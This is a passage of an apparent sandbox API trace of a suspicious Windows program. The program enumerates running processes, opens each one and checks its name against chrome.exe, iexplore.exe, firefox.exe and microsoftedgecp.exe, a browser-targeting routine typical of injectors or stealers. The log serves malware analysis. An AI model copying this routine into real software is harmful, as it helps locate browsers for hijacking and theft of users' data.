	[0194.442] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0194.443] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0xc40
	[0194.443] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.443] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0194.444] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.444] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.444] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.444] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0194.444] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.444] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.444] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0194.445] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0xc44
	[0194.445] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.445] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0194.445] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.445] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.446] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.446] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0194.446] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.446] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.446] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0194.447] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0xc48
	[0194.447] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.447] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0194.447] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.447] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.447] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.447] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0194.448] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.448] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.448] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0194.448] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0xc4c
	[0194.449] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.449] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0194.449] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.449] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.449] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.449] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0194.450] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.450] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.450] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0194.450] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0xc50
	[0194.450] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.451] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0194.451] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.451] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.451] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.451] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0194.451] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.451] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.452] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0194.452] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0xc54
	[0194.452] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.452] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0194.453] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.453] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.453] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.453] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0194.453] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.453] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.453] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0194.454] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0xc58
	[0194.454] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.454] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0194.455] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.455] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.455] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.455] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0194.455] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.455] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.455] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0194.456] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0xc5c
	[0194.456] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.456] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0194.457] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.457] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.457] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.457] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0194.457] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.457] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.457] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0194.458] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0xc60
	[0194.458] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.458] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0194.458] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.458] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.459] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.459] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0194.459] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.459] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.459] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0194.460] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0xc64
	[0194.460] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.460] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0194.460] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.460] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.461] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.461] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0194.461] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.461] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.461] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0194.462] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0xc68
	[0194.462] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.462] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0194.462] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.462] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.462] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.462] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0194.463] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.463] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.463] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0194.464] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0xc6c
	[0194.464] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.464] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0194.464] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.464] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.464] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.464] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0194.465] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.465] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.465] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0194.465] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0xc70
	[0194.466] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.466] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0194.466] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.466] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.466] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.466] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0194.466] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.467] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.467] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0194.467] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0xc74
	[0194.467] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.468] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0194.468] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.468] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.468] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.468] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0194.468] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.468] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.469] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0194.469] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0xc78
	[0194.469] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.469] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0194.470] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.470] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.470] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.470] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0194.471] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.471] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.471] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0194.472] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0xc7c
	[0194.472] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.472] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0194.472] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.472] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.472] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.472] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0194.473] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.473] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.473] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0194.474] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0xc80
	[0194.474] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.474] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0194.474] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.474] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.474] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.474] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0194.475] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.475] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.475] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0194.475] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0xc84
	[0194.476] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.476] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0194.476] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.476] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.476] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.476] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0194.476] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.476] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.476] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0194.477] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0xc88
	[0194.477] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.477] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0194.478] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.478] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.478] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.478] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0194.478] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.478] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.478] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0194.479] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0194.479] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0194.480] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0xc8c
	[0194.480] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.480] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0194.480] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.480] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.481] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.481] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0194.481] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.481] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.482] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0194.483] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0xc90
	[0194.483] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.483] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0194.483] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.483] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.483] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.483] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0194.484] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.484] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.484] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0194.484] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0xc94
	[0194.484] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.485] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0194.485] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.485] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.485] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.485] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0194.485] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.485] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.486] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0194.487] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0xc98
	[0194.487] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.487] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0194.487] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.487] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.488] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.488] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0194.488] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.488] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.488] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0194.489] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0xc9c
	[0194.489] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.489] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0194.490] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.490] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.490] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.490] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0194.491] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.491] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.491] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0194.492] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0xca0
	[0194.492] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.492] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
